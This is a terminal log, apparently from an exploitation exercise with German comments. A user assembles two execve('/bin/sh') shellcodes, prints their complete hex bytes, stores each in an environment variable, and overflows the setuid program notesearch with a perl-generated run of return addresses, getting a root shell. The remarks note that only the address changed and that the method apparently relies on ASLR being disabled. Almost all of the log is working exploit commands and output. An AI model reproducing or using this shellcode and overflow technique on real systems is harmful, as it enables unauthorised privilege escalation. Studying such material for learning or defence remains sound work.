root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nasm exec_shell.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# wc -c exec_shell
36 exec_shell
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C exec_shell
00000000  eb 16 5b 31 c0 88 43 07  89 5b 08 89 43 0c 8d 4b  |..[1..C..[..C..K|
00000010  08 8d 53 0c b0 0b cd 80  e8 e5 ff ff ff 2f 62 69  |..S........../bi|
00000020  6e 2f 73 68                                       |n/sh|
00000024
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# export SHELLCODE=$(cat exec_shell)
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff8cf
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./notesearch $(perl -e 'print "\xcf\xf8\xff\xbf"x40')
[DEBUG] found a 31 byte note for user id 0
-------[ end of note data ]-------
# whoami
root
# su
 
Nur die Adresse hat sich geändert

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nasm tiny_shell.s               
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# wc -c tiny_shell
25 tiny_shell
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C tiny_shell
00000000  31 c0 50 68 2f 2f 73 68  68 2f 62 69 6e 89 e3 50  |1.Ph//shh/bin..P|
00000010  89 e2 53 89 e1 b0 0b cd  80                       |..S......|
00000019
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# export SHELLCODE=$(cat tiny_shell)
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffffe2b
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./notesearch $(perl -e 'print "\x2b\xfe\xff\xbf"x40')
[DEBUG] found a 31 byte note for user id 0
-------[ end of note data ]-------
# ^C
# exit

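Nur die Adresse hat sich geändert: getenvaddr meldet für SHELLCODE jetzt 0xbffffe2b statt 0xbffff8cf, der übrige Aufruf von notesearch bleibt gleich. Dass die vorab ermittelte Adresse beim eigentlichen Lauf noch stimmt, setzt vermutlich voraus, dass die Stack-Adressen nicht randomisiert werden (ASLR deaktiviert).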

 

   
